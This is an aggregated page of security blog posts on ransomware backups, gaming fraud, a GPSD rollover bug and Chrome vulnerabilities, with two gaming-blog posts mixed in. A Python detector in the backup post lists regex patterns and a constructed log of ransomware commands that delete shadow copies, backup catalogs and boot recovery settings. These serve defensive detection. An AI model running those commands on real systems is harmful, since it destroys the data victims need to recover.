Feed aggregator

Ransomware: Why do backups fail when you need them most?

Malwarebytes - Fri, 10/22/2021 - 14:11

It’s widely known, and endlessly repeated, that the last, best line of defence against the potentially devastating effects of a ransomware attack is your backups.

So why do we keep hearing things like this:

We’re also feeling relatively confident, we have a very good backup system … and then we find out at about four or five hours after the [ransomware] attack that our backup system is completely gone.

Ski Kacoroski, System administrator, Northshore School District

The quote above comes from a recent Malwarebytes podcast, racing against a real life ransomware attack, in which host David Ruiz interviewed sysadmin Ski Kacoroski about a ransomware attack on the Northshore School District in Washington State.

Kacoroski’s alarming discovery—that the backups he was relying on to restore the school district’s damaged systems were unusable—is not unusual in the aftermath of a ransomware attack. The glib and depressingly common response from some in the IT community is to assume that those involved were idiots, and to blame them for their misfortune, observing with hindsight that they should have known they needed to spend more on this, run that, patch this, check that, etc.

A more realistic, more useful, perspective assumes that system administrators and security folk like Kacoroski are competent, intelligent people who are doing their best to meet multiple requirements in complex environments with limited resources. Starting there, the obvious conclusion from experiences like Kacoroski’s is that backups are hard to get right.

Why do backups fail?

Following the interview with Kacoroski, we set out to find out why getting backups right is so difficult. To help us we approached backup expert Matt Crape, a technical account manager at VMWare, and put exactly that question to him in a follow-up podcast episode, Why backups aren’t a “silver bullet” against ransomware.

This is what we learned from Crape:

Backups are difficult

Crape observed that people often imagine backups are easy, because their only experience of performing backups is doing them at home, where it is easy: You just plug a USB hard drive into your laptop every night and press a button.

But add a few hundred computers and you’re living in a different world.

Step one, says Crape, is figuring out what you’re trying to achieve. To do that you have to work through a series of important but difficult questions, including:

  • Are you backing up just your data, or your data and your applications?
  • Are you archiving medical information or personally identifiable information that comes with regulatory requirements dictating where, how, and for how long you can store it?
  • How many copies of the data and applications will you make, and where will you keep them?
  • How long will you store each type of data? Do you need versioning?
  • How often are you going to back everything up? Are you going to run the same schedule for all your data, no matter how important it is or how often it changes, or different schedules for different things?
  • And how will the scheduling, and the amount of data travelling over the network at different times, affect performance?

A backup archived to tape or the Cloud is only half the story too. It can only be considered a success if you can restore a working system from it, and there are a few things that can derail that.

Databases, for example, typically have to be quiesced, or dumped with their own tools, before you can take a backup that will restore to a consistent state; copying the live data files out from under a running SQL server is not enough. Many applications also depend on other services (such as DNS, email or authentication), and you’ll need to understand and record those relationships, and have a plan for restoring systems in the right order, if you want it all to come back to life.

You also need a process for reviewing those decisions regularly. Businesses evolve and change, and your backups have to keep up.

And finally, having done all that, you’ll need to do something far more difficult—convince someone it’s all worth paying for.

Backups are expensive

According to Crape “That money conversation was always the hardest part”. The problem with backups, he says, is that 99% of the time you don’t need them, so they can seem like money down the drain.

Ransomware changes the calculation considerably. Aside from their day-to-day uses, organisations have historically seen backups as a way to cope with natural disasters and other severe but infrequent events. It is easy to understand why they might put off dealing with that problem until tomorrow in favour of more immediate concerns.

But a ransomware attack isn’t a lightning strike or a once-in-a-hundred-years flood. According to IDC, “more than one third of organizations worldwide have experienced a ransomware attack or breach that blocked access to systems or data in the previous 12 months”. Other organisations might give you slightly different figures, but there’s no doubt that ransomware attacks are frighteningly common.

Crape suggests that the best way to make the argument for properly staffed and funded backups is to make the conversation about the cost of losing key systems: “How much downtime can we afford for this specific server? What’s the cost of that vs the cost of storing backups for three years?”

Backups are targets

“Had the Empire had better physical security for their backup archives, the Star Wars franchise would be markedly different”.

Matt Crape, Technical Account Manager, VMWare

Backups contain all the information that makes a company tick, which makes them targets for both theft and sabotage. For a modern fable on the menace of insider threats and the importance of physical security for backups, just watch Rogue One: A Star Wars Story, says Crape. “The Death Star blew up because of a backup.”

Ransomware gangs understand that your backups could deprive them of a multimillion dollar payday and will seek them out and delete them if they can. It’s also not unusual for criminal hackers to spend days, weeks, or even months inside the networks of organisations they’ve breached. They use that time to perform reconnaissance and elevate their privileges, so they can reach all parts of the network, including its backups (even Cloud backups). If they can find them, they will destroy them before running their ransomware.

When it is finally run, many kinds of ransomware will also look for and disable or delete shadow copies—a form of local backups—on the machines they infect, cutting off the possibility of restoring those machines with a quick rollback.
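That deletion step is one of the most reliable moments to catch ransomware before encryption starts, because the commands involved are few and distinctive. As an added example, not from the article, here is a small Python detector that runs over process-creation events (in the style of Sysmon Event ID 1 or Windows Security event 4688) and flags the usual shadow-copy, backup-catalog and recovery-setting commands; the log lines and their key=value layout are constructed for the example rather than taken from a real export.

```python
"""Flag process-creation events that delete shadow copies or disable recovery.

Added example, not from the article. The log format below (one event per
line, key=value fields, quoted command line) is a constructed simplification
of a Sysmon Event ID 1 / Security 4688 export, not a real schema.
"""
import re
from typing import Dict, List

# Each rule names one well-known pre-encryption command (MITRE ATT&CK T1490,
# Inhibit System Recovery). Matching is case-insensitive and tolerant of
# extra whitespace, which is how these commands are usually varied.
RULES = [
    ("vssadmin_delete_shadows",
     re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b", re.I)),
    ("vssadmin_resize_shadowstorage",
     re.compile(r"\bvssadmin(\.exe)?\b.*\bresize\s+shadowstorage\b", re.I)),
    ("wmic_shadowcopy_delete",
     re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I)),
    ("wbadmin_delete_catalog",
     re.compile(r"\bwbadmin(\.exe)?\b.*\bdelete\s+(catalog|systemstatebackup)\b", re.I)),
    ("bcdedit_disable_recovery",
     re.compile(r"\bbcdedit(\.exe)?\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
    ("powershell_win32_shadowcopy",
     re.compile(r"\bwin32_shadowcopy\b.*\b(delete|remove)", re.I)),
]

# Constructed event layout: timestamp, host, user, parent image, command line.
EVENT = re.compile(r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) '
                   r'parent=(?P<parent>\S+) cmdline="(?P<cmdline>.*)"$')


def parse_event(line: str) -> Dict[str, str]:
    m = EVENT.match(line.strip())
    if not m:
        raise ValueError("unparseable event: %r" % line)
    return m.groupdict()


def detect(log_text: str) -> List[Dict[str, str]]:
    """Return one finding per (event, rule) match."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        for name, rx in RULES:
            if rx.search(ev["cmdline"]):
                findings.append(dict(ev, rule=name))
    return findings


def hosts_at_risk(findings: List[Dict[str, str]]) -> List[str]:
    return sorted({f["host"] for f in findings})


# Constructed sample: an operator listing shadows (benign), a backup agent
# creating one (benign), and an attacker's wipe sequence on two hosts.
SAMPLE_LOG = """\
2021-10-22T14:11:03Z host=ws-0042 user=CORP\\jsmith parent=explorer.exe cmdline="vssadmin.exe list shadows"
2021-10-22T14:11:09Z host=ws-0042 user=CORP\\jsmith parent=cmd.exe cmdline="vssadmin.exe  Delete Shadows /All /Quiet"
2021-10-22T14:11:10Z host=ws-0042 user=CORP\\jsmith parent=cmd.exe cmdline="wmic.exe shadowcopy delete /nointeractive"
2021-10-22T14:11:11Z host=ws-0042 user=CORP\\jsmith parent=cmd.exe cmdline="bcdedit.exe /set {default} recoveryenabled No"
2021-10-22T14:11:12Z host=ws-0042 user=CORP\\jsmith parent=cmd.exe cmdline="wbadmin.exe delete catalog -quiet"
2021-10-22T14:11:13Z host=fs-01 user=SYSTEM parent=services.exe cmdline="powershell.exe -nop -w hidden Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }"
2021-10-22T14:12:00Z host=fs-01 user=CORP\\backupsvc parent=backupagent.exe cmdline="vssadmin.exe create shadow /for=D:"
"""

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f["ts"], f["host"], f["rule"], "<-", f["cmdline"])
```

The benign lines (an operator listing shadows, a backup agent creating one) are deliberately not matched; the one tuning most teams need is an allow-list keyed on the parent process for backup products that legitimately delete old shadows. Because deletion typically runs seconds before encryption, this belongs in a page-someone alert, not a daily report.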

If your ransomware recovery plan relies on backups, you will need copies of your data that are offline and off-site, where they are permanently beyond the reach of an attacker who may be resident in your network for months.

Everyone assumes they’re working

According to Crape, another reason that backups let us down when we need them most is that people simply assume they are running correctly. “It’s not uncommon to hear about folks who just don’t check the status, ever”, he told Ruiz. “They’ll check it the first couple of days and then it gets old so they stop paying attention to it, or they turn off notifications because it’s just been running fine. You go to do a restore and you find out, oh, this thing hasn’t run in six months.”

It’s not enough to monitor that the application ran without failing, says Crape. A backup job can run without failing, but that doesn’t mean it did anything; and just because the job ran properly, that doesn’t mean the tape isn’t blank; and having something on tape doesn’t mean you have something that will usefully restore.

If you want to know if your backups are working, you have to test them. And that means doing a full restore into another environment.
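As an added illustration of what a restore test looks like in code (this is not from the article, the podcast, or any backup product), here is a small Python check that treats a backup as good only if the archive is fresh, non-empty, readable, and restores files whose hashes match a manifest recorded at backup time. The tar.gz layout, the manifest, and the four scenarios are constructed for the example.

```python
"""Restore-test a backup instead of trusting the job's exit code.

Added example (not from the Malwarebytes article or any vendor tool). It
assumes backups are plain tar.gz archives plus a manifest of SHA-256 hashes
recorded when the archive was written; that layout is my own choice.
"""
import hashlib
import os
import tarfile
import tempfile
import time
import zlib
from pathlib import Path


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def make_backup(src: Path, archive: Path) -> dict:
    """Archive every file under src; return {relative_path: sha256}."""
    manifest = {}
    with tarfile.open(archive, "w:gz") as tar:
        for p in sorted(src.rglob("*")):
            if p.is_file():
                rel = p.relative_to(src).as_posix()
                manifest[rel] = sha256_file(p)
                tar.add(p, arcname=rel)
    return manifest


def verify_backup(archive: Path, manifest: dict, max_age_s: float) -> list:
    """Restore into scratch space and compare. Returns a list of problems;
    an empty list is the only result that counts as a working backup."""
    problems = []
    if not archive.exists():
        return ["archive missing"]
    age = time.time() - archive.stat().st_mtime
    if age > max_age_s:
        problems.append("archive is stale (%.0f s old)" % age)
    with tempfile.TemporaryDirectory() as scratch:
        root = Path(scratch)
        try:
            with tarfile.open(archive, "r:gz") as tar:
                if not any(m.isfile() for m in tar.getmembers()):
                    problems.append("archive contains no files")
                if hasattr(tarfile, "data_filter"):       # 3.12+ and backports
                    tar.extractall(root, filter="data")  # refuses path traversal
                else:
                    tar.extractall(root)
        except (tarfile.TarError, EOFError, OSError, zlib.error) as e:
            return problems + ["archive unreadable: %s" % e]
        for rel, digest in manifest.items():
            p = root / rel
            if not p.is_file():
                problems.append("missing after restore: " + rel)
            elif sha256_file(p) != digest:
                problems.append("corrupt after restore: " + rel)
    return problems


def demo() -> dict:
    """Four constructed scenarios: a good backup, an empty one, a truncated
    one, and one whose schedule silently stopped a week ago."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        base = Path(d)
        src = base / "data"
        (src / "db").mkdir(parents=True)
        (src / "db" / "students.csv").write_text("id,name\n1,alice\n2,bob\n")
        (src / "config.yaml").write_text("retention_days: 90\n")

        good = base / "good.tgz"
        manifest = make_backup(src, good)
        results["good"] = verify_backup(good, manifest, max_age_s=3600)

        # The job exited 0 but wrote nothing: a valid, empty archive.
        empty = base / "empty.tgz"
        with tarfile.open(empty, "w:gz"):
            pass
        results["empty"] = verify_backup(empty, manifest, max_age_s=3600)

        # The media is damaged: the archive was cut short.
        truncated = base / "truncated.tgz"
        truncated.write_bytes(good.read_bytes()[:40])
        results["truncated"] = verify_backup(truncated, manifest, max_age_s=3600)

        # Nobody noticed the schedule broke: the newest archive is a week old.
        week_ago = time.time() - 7 * 86400
        os.utime(good, (week_ago, week_ago))
        results["stale"] = verify_backup(good, manifest, max_age_s=86400)
    return results


if __name__ == "__main__":
    for name, problems in demo().items():
        print(name, "OK" if not problems else problems)
```

The job's exit code is never consulted; only what actually comes back out of the archive counts. In production the restore goes into an isolated network segment, the application is started against the restored data, and the job alerts on any non-empty problem list.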

Listen to the podcast

To learn more about why backups fail and how you can use them to effectively combat ransomware, listen to the full podcast below, or in your favourite podcast player from Apple, Spotify, or Google.


The post Ransomware: Why do backups fail when you need them most? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

We dig into the Game Players Code

Malwarebytes - Fri, 10/22/2021 - 14:00

Gaming security is getting a lot of attention at the moment. Rightly so; it’s a huge target for scammers and malware authors. Malicious ads, fake games, survey scams, phishing attacks…whatever you can think of, it’s in use. Some target kids and steal their accounts, selling them on. Others go after parents, who have their payment details tied to various platforms and consoles. Whatever the scammer is into, rich pickings can be theirs for the taking.

As we’ve shown previously, you don’t even have to be on a gaming platform to be at risk from shenanigans. You can run into something bad and gaming-related purely from hanging out somewhere else. These attacks, these tactics, are pervasive.

Some organisations are trying to turn the tide, however.

Step up to the plate, Game Players Code

Banks are noticing just how much time is spent dealing with gaming theft issues. No doubt their support calls tell a grim tale of cancelled cards and chargebacks. Tip: some gaming platforms will ban or cancel a gaming account by default should you ever reverse a dubious charge. Never do this if you can help it.

Lloyds Bank, in response to the never-ending glut of financial gaming fraud, has come up with something called “Shield against scams”. This is designed to give younger gamers a helping hand to avoid video game fakery. They’ve also got some well known gamer influencers on board, which can only help get the message in front of gamers. Shall we take a look at each tip and see what else we can add to the discussion?

Chat screening and anonymity

SCREEN any chats from strangers, as well as unexpected gifts and special edition or time-limited offers. Never transfer money to someone you haven’t met in person.

HIDE personal information from others at all times, concealing your personal details where possible to avoid them being leaked.

This is a good start. Concealing player information is also helpful. Gaming forums, databases, and websites are often targeted by compromise and data theft. When the hammer falls, it’s probably best to have as few visible bits of personal information as possible. Always check the privacy specifics of whatever platform you’re using.

Some enable settings like real ID (your actual real name) by default, making it visible to whoever has the correct level of permissions. This could be a friend you’ve added, or random players looking at your profile. Other platforms won’t display real names or locations without you physically typing them into your profile. Consoles are a particular concern here because they have so many different settings across multiple menus. Many of them will have a privacy component to them, but you’ll have to dig around and make those connections yourself. It could be a slow process, so set some time aside for that.

Chat, whether in game or via a client, is an inroad to bad messages. You may even run into bogus messages in chat/VoIP land. The “I accidentally reported you” scam is hitting saturation point at the moment. Last but not least, beware of Real Money Trading if you play massively multiplayer online games.

Be cautious with payments

INVESTIGATE any gaming-related purchases before handing over money, such as checking whether the website is blacklisted on https://sitechecker.pro/blacklist-checker/ and only making card payments that offer greater consumer protections.

Another decent tip. Much of the gaming fraud we see at the moment is related to in-game purchases or DLC. Most commonly weapons, skins, outfits and the like. Some gaming platforms like Steam allow gamers to trade items. Fake trade phishes have been around for years and are very popular.

Evaluating the download risk

EVALUATE whether gaming-related downloads are being made from established trusted sources and whether they are safe by checking for malware via https://www.virustotal.com/

Generally speaking, all gaming downloads should be coming from the source (the platform you’re using) directly. Want to play Diablo 3? You’ll be using the Battle.net client on PC. Steam games? You’ll use the big download button inside the Steam client. Uplay? Origin? Epic store? The same rule applies. On a games console, it’s even more locked in. You can’t exactly go wandering off to a rogue download on a PS4.

As far as these files go, in theory you shouldn’t need to scan them (indeed, it isn’t possible to scan them if they’re on a games console). Sometimes things can go wrong with files from an official source, but this is pretty rare. Apply your own better judgment on this one.

Should you stray outside your walled client garden, that’s the time to be suspicious. Messages about free games, dubious offers/adverts, or random uploads to YouTube promising free cracked copies of the latest titles should be given a wide berth. You can certainly use VirusTotal for a quick check, but you should also read up on what it does. We would always recommend using your dedicated security tools in addition to any web-based scan.

Locking down

LOCK your gaming network by using password managers, two-factor authentication within platforms and anti-virus software.

Good tips. There are many gaming platforms. Some of them have titles exclusive to them, or deals which are better than anywhere else. Even if you decide to stick with Steam, certain games will insist on you also using their creator’s gaming platform. So you could fire up a Far Cry game on Steam, but you may need to launch the Uplay client…via Steam…and the game launches from there.

This may have changed, it’s been a few years since I tried it myself. But this is not an uncommon thing to happen.

Before you know it, you don’t just need a secure email tied to your gaming platform. You need logins for Steam, Uplay, Epic, Blizzard, multiple logins for MMORPG launchers, passwords in consoles, passwords everywhere. A password manager is exactly the kind of solution to this headache.

Two-factor authentication was rather uncommon in most gaming circles years ago, but it’s pretty much the default now. You can have it on your PC gaming clients, your consoles, your email. There’s Google Authenticator, or dedicated apps depending on the game publisher. Whatever your gaming network of choice, this is almost certainly something you can make use of.

Card safety concerns

DELINK your bank details from gaming and online browser accounts. Having two-factor authentication set up on bank transactions and using prepaid cards will also help to keep your money protected.

Payment information on accounts is a risk, but having payment information on any account can be a risk. The question is what can you put in place to lessen this, and how much damage can someone do if they get that information?

Many gaming clients allow you to store details, or delete them as appropriate. For example, you can tell Steam whether or not to remember payment info. You can also load up an account with funds via the Steam wallet, or put certain amounts of money onto the account with gift cards. Yes, someone can still steal an account and if it has £100 sitting on it, that’s bad. Some may argue that’s actually worse than stored card details.

If payment info is stored in Steam, you still have to enter the verification code on the back of the card (the CVV) for any transaction, as this isn’t retained. While an account with details stored on it will still be valuable to someone out there, most people can’t simply start spending. They don’t have the code. However, an account with £100 or £300 sitting on it is an instant spend-festival.

As a result, a good tip is to only load up the account with smaller amounts of cash. It’s still bad if it gets stolen, but not £300 bad.

In conclusion…

Any attempt to make gaming realms more secure is a good thing. While you may have to add a bit more context to the tips as they stand, the basics are in place and that’s what we need to encourage young gamers with. Any positive change in habits, whether from the kids or the parents helping behind the scenes, can only be beneficial for everyone.

The post We dig into the Game Players Code appeared first on Malwarebytes Labs.

Categories: Techie Feeds

On 10 Ways To Open A Chest

Hack & Slash - Fri, 10/22/2021 - 13:00
"But assuming it was a treasure hunting expedition (and the lower floors of the tower were reasonably cleared, with a path of escape blocked only by wandering monster rolls) what would a party need to do in one of your games to safely open a chest?"
Here are 10 ways to open a chest safely!

10. Pour acid in the lock.
9. Use a pick and chisel to break apart the lock mechanism.
8. Use a crowbar and specialized tools to pry the lock out of the chest.
7. Saws!
6. Carry the chest back to town and pay the thieves guild to open it.
5. Hammers!
4. Knock!
3. Unscrew the lid hinges.
2. Pry off the back of the lid!

And the number one way to open a chest safely?

1. Have the thief open it, there's always more where they came from!

Why don't they just do these things by default? They are time consuming, loud, or require heavy encumbrance penalties.

Categories: Tabletop Gaming Blogs

A bug is about to confuse a lot of computers by turning back time 20 years

Malwarebytes - Fri, 10/22/2021 - 12:16

For those of you that remember the fuss about the Y2K bug, this story may sound familiar.

The Cybersecurity & Infrastructure Security Agency (CISA) has issued a warning to Critical Infrastructure (CI) owners and operators, and other users who get the time from GPS, about a GPS Daemon (GPSD) bug in GPSD versions 3.20 through 3.22.


If you don’t remember the Y2K bug, let me remind you quickly. Before the year 2000, lots of computer programs kept track of the year by remembering the last two digits instead of all four. Programs coded this way would work correctly until the first day of the new millennium, when they would assume they’d been transported back in time 100 years to 1900.

Some computer programs don’t care what time it is, but others do, and there were genuine fears that getting the date wrong by -100 years might cause the lights to go out, or planes to fall from the sky.

In the end, those big problems didn’t materialize, because everyone received a warning or two, or twenty, way in advance, and there was enough time to take action and fix the broken code.

What’s the bug now?

Alongside telling you where in space you are, the Global Positioning System (GPS) can also tell you where in time you are. To do this, it keeps a count of the number of weeks since the GPS epoch, 00:00 UTC on January 6, 1980. The legacy civil GPS signal broadcasts the GPS week number as a 10-bit field with a maximum value of 1,023, so every 1,024 weeks (roughly 19.6 years) the transmitted week number rolls over to zero, and it is up to the receiving software to work out which 1,024-week epoch it is actually in.

GPSD is a GPS service daemon for Linux, OpenBSD, Mac OS X, and Windows. It collects data from GPS receivers and makes that data accessible to computers, which can query it on TCP port 2947. It can be found on Android phones, drones, robot submarines, driverless cars, manned military equipment, and all manner of other embedded systems.

Unfortunately, in an echo of the Y2K bug, a flaw in some versions of GPSD could cause time to roll back after October 23, 2021. The buggy versions of the code reportedly subtract 1,024 from the week number on October 24, 2021. This would mean Network Time Protocol (NTP) servers using the broken GPSD versions as their time source would think it’s March 2002 instead of October 2021.
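To make the arithmetic concrete, here is an added Python example (not gpsd’s code) that computes GPS week numbers from calendar dates, truncates them to the 10 bits the legacy message carries, and shows the correct way to recover the full week from a “not before” date such as the software’s build date, next to a simplified illustration of the failure mode described above: a sanity check that subtracts 1,024 weeks once the week number passes a hard-coded cutoff. The cutoff date, the build date and the receiver dates are assumptions chosen to reproduce the symptom.

```python
"""GPS week numbers, the 10-bit rollover, and how a naive 'fix' goes wrong.

Added example; it is not gpsd's code. resolve_week_buggy is a simplified
illustration of subtracting 1024 weeks past a hard-coded cutoff, chosen
only to reproduce the symptom described in the article (late 2021 read as
March 2002); the cutoff date is an assumption. Leap seconds are ignored,
so week boundaries are off by the 18 s GPS-UTC offset, which does not
matter for whole-day arithmetic.
"""
from datetime import date, timedelta

GPS_EPOCH = date(1980, 1, 6)     # GPS week 0 began 00:00 UTC on this Sunday
WEEK_BITS = 10                   # legacy L1 C/A navigation message
WEEK_MOD = 1 << WEEK_BITS        # 1024 weeks, about 19.6 years


def gps_week(d: date) -> int:
    """Full, un-wrapped week number for a UTC calendar date."""
    return (d - GPS_EPOCH).days // 7


def week_start(week: int) -> date:
    """First day (Sunday) of a full GPS week number."""
    return GPS_EPOCH + timedelta(weeks=week)


def broadcast_week(d: date) -> int:
    """What the legacy message actually carries: the low 10 bits."""
    return gps_week(d) % WEEK_MOD


def resolve_week(transmitted: int, not_before: date) -> int:
    """Correct disambiguation: choose the 1024-week epoch in which the
    transmitted value falls on or after a date the software knows is
    already in the past (typically its own build or release date)."""
    base = gps_week(not_before)
    candidate = base - (base % WEEK_MOD) + transmitted
    if candidate < base:
        candidate += WEEK_MOD
    return candidate


# Assumed hard-coded 'weeks after this are impossible' value, set so that
# the first bad week is the one beginning 24 October 2021 (the symptom).
CUTOFF_WEEK = gps_week(date(2021, 10, 24))


def resolve_week_buggy(transmitted: int, not_before: date) -> int:
    """resolve_week followed by a 'sanity check' that discards a whole epoch
    once real time passes the fixed cutoff: the bug class described above."""
    week = resolve_week(transmitted, not_before)
    if week >= CUTOFF_WEEK:
        week -= WEEK_MOD
    return week


def demo(today: date, build_date: date) -> dict:
    """Decode the week a receiver would transmit on `today` both ways."""
    tx = broadcast_week(today)
    good = resolve_week(tx, build_date)
    bad = resolve_week_buggy(tx, build_date)
    return {"transmitted": tx,
            "correct": week_start(good), "buggy": week_start(bad)}


if __name__ == "__main__":
    # (receiver date, software build date) pairs; build dates are assumptions.
    for today, build in ((date(2019, 4, 7), date(2019, 1, 1)),
                         (date(2021, 10, 23), date(2021, 1, 15)),
                         (date(2021, 10, 24), date(2021, 1, 15))):
        print(today, demo(today, build))
```

Run it to see the three dates decoded both ways: the April 2019 rollover is handled correctly by both resolvers, 23 October 2021 is still fine, and 24 October 2021 collapses to 10 March 2002 in the buggy path. The correct resolver needs only a date that is guaranteed to be in the past; the buggy one needs a date in the future that someone must remember to move, which is exactly what gets forgotten.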

How bad is it?

For computer systems that have no other time reference, being thrown back in time can cause several security issues. From the perspective of incident handling and incident response, well-synchronized time across systems facilitates log analysis, forensic activities and correlation of events. Losing track of what happened when can lead to missed incidents.

Even worse is getting shut out. NTP servers using the bugged GPSD versions would be thrown back almost 20 years, and the Network Time Protocol (NTP) is, in many environments, what keeps every other system’s clock accurate. Authentication mechanisms such as Time-based One-Time Passwords (TOTP) and Kerberos rely heavily on time, so if clocks disagree by more than their tolerance (five minutes by default for Kerberos, a step or two of 30 seconds for TOTP), users will not be able to authenticate and gain access to systems.
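As an added example (not from the article), the following Python implements RFC 6238 TOTP and shows what happens when a phone with the correct time presents a code to a server whose clock has been pushed back 1,024 weeks: even with the usual one-step tolerance on either side, the server computes codes for March 2002 and rejects the login. The secret is the RFC test-vector secret and the timestamps are constructed.

```python
"""Why a clock rolled back 1024 weeks breaks TOTP logins.

Added example, not from the article. It implements RFC 6238 TOTP (HMAC-SHA1,
30 s step, 6 digits) and checks a code generated by a correctly-timed phone
against a server whose clock has jumped back 1024 weeks. The secret is the
RFC 6238 test-vector secret and the timestamps are constructed.
"""
import hashlib
import hmac
import struct
from datetime import datetime, timezone

STEP = 30
DIGITS = 6
ROLLBACK_S = 1024 * 7 * 86400        # one 10-bit GPS week epoch, in seconds


def hotp(secret: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226 dynamic truncation over HMAC-SHA1(secret, counter)."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: float, step: int = STEP) -> str:
    return hotp(secret, int(unix_time) // step)


def verify_totp(secret: bytes, code: str, server_time: float, window: int = 1) -> bool:
    """Accept the code for the current step or +/- `window` steps around the
    server's idea of now, using a constant-time compare."""
    counter = int(server_time) // STEP
    return any(hmac.compare_digest(hotp(secret, counter + i), code)
               for i in range(-window, window + 1))


def demo() -> dict:
    """A phone with the right time authenticates to a server that is right,
    then to the same server after its time source rolled back to 2002."""
    secret = b"12345678901234567890"   # RFC 6238 test-vector secret, not a real key
    real_now = datetime(2021, 10, 24, 12, 0, tzinfo=timezone.utc).timestamp()
    code = totp(secret, real_now)      # generated on the phone
    rolled_back = real_now - ROLLBACK_S
    return {
        "code": code,
        "server_ok": verify_totp(secret, code, real_now),
        "server_rolled_back": verify_totp(secret, code, rolled_back),
        "server_clock_reads": datetime.fromtimestamp(rolled_back, timezone.utc).isoformat(),
    }


if __name__ == "__main__":
    print(demo())
```

The same shape of failure applies to Kerberos tickets and anything else that compares timestamps. The fix is never to widen the acceptance window, since that also widens the window for replayed codes; it is to restore a trustworthy time source.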

The same goes for anything else with a validity window. A server thrown back to 2002 will issue session cookies and tokens that expire in 2002, which clients discard as already expired, and it will reject current TLS certificates as not yet valid.

And speaking from experience, the last GPS week number reset to zero occurred on April 6, 2019. Many GPS-enabled devices that were not properly designed to account for the rollover event exhibited problems on that date. Other equipment became faulty several months before or after that date, requiring software or firmware patches to restore their function.


Since the affected versions of GPSD are 3.20 through 3.22, users should upgrade to version 3.23.1. Downgrading to versions older than 3.20, such as 3.19, is not recommended either, since they are unsupported and have bugs of their own. Organizations that use GPS appliances or rely on GPSD should check whether GPSD is in use anywhere in the infrastructure (including inside appliances and embedded devices that may not advertise it) and which version is installed. If no recent upgrades were performed, an upgrade to GPSD will most likely be required.

It is also good for system administrators to make a mental note of the date October 24, 2021. If systems that had been authenticating normally start to have authentication issues after the weekend, it could be due to a mismatched date and time.

If you would like to be spared this roll-back problem completely, the GPS modernization program is adding new civilian signals to the GPS system whose navigation messages carry a 13-bit week number, which rolls over only every 8,192 weeks (about 157 years).

Personal note

Should your system go back to 2002, can you instruct it to tell me to invest in Bitcoin, please?

The post A bug is about to confuse a lot of computers by turning back time 20 years appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Minaria: Muetar

Sorcerer's Skull - Fri, 10/22/2021 - 11:00
Muetar is the largest kingdom of Minaria in land area and possessed of the largest army. Its rulers are the descendants of the Mueta horse lords who first harried the city-states of the Land of the Great Rivers, then were its foederates, until a chieftain general Oyaro (Old Meuta: Hoyaru), forced the Princes of Methluma to give him the title of Supreme General or Warlord. The word, as borrowed into the Muetarian tongue, eventually came to mean "emperor." Oyaro's line came to be the de facto rulers of the land in a military dictatorship that developed over generations into the current feudal state.

The Empire's current ruler is Herrott (Kheroth) of the Pirostar (Phiroshtar) Dynasty, sometimes called "Golden Helm" for the brightly polished helmet he wears in battle. Herrott was the second son and given command of the elite guard of the Emperor, but ascended to the throne upon the death of his older brother in a riding accident. While his father's rule was occupied with internal struggles, Herrott turns his eyes toward expanding the empire, but he is cautious and not prone to rash action. He is an avid falconer as well as rider and pampers his prize animals.

Atata, his Empress, is descended from the old Oyarostar line. She has little taste for court gossip or petty intrigues and is judged as aloof and perhaps even severe by her ladies in waiting. Like all Muetarian elite she takes part in the rituals of the martial cult of Anshar (who has absorbed much of the folio and importance of the supreme god Taquamenau in the Muetarian ascendance), but supports a policy of religious tolerance in the Empire. She is an advocate for the poor and is said to use her influence to protect the more moderate clerics of Huisinga--this despite the peasant uprising blamed on radical members of the Sankari sect during the reign of Herrott's father, Maasa.
Atata is also a patron of the arts and has even brought Ponian theater to the court of Muetar.

Update now! Chrome fixes more security issues

Malwarebytes - Thu, 10/21/2021 - 13:31

For the third time in a month Google has issued an update to patch several security issues. This time the update patches 19 vulnerabilities, of which 5 are classified as “high” risk.

In an update announcement for Chrome 95.0.4638.54, Google specifies the 16 vulnerabilities that were found by external researchers.

The CVEs

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

Below are the CVEs attributed to external researchers that got rated as high risk:

  • CVE-2021-37981 (High CVSS 7.7) : Heap buffer overflow in Skia. The vulnerability exists due to a boundary error when processing untrusted HTML content in Skia. A remote attacker can create a specially crafted web page, trick the victim into opening it, trigger a heap-based buffer overflow and execute arbitrary code on the target system.
  • CVE-2021-37982 (High CVSS 7.7): Use after free in Incognito. The vulnerability exists due to a use-after-free error within the Incognito component in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the target system.
  • CVE-2021-37983 (High CVSS 7.7): Use after free in Dev Tools. The vulnerability exists due to a use-after-free error within the Dev Tools component in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the target system.
  • CVE-2021-37984 (High CVSS 7.7): Heap buffer overflow in PDFium. The vulnerability exists due to a boundary error when processing untrusted HTML content in PDFium. A remote attacker can create a specially crafted web page, trick the victim into opening it, trigger a heap-based buffer overflow and execute arbitrary code on the target system.
  • CVE-2021-37985 (High CVSS 7.7) : Use after free in V8. The vulnerability exists due to a use-after-free error within the V8 component in Google Chrome. A remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger a use-after-free error and execute arbitrary code on the target system.

Heap buffer overflow

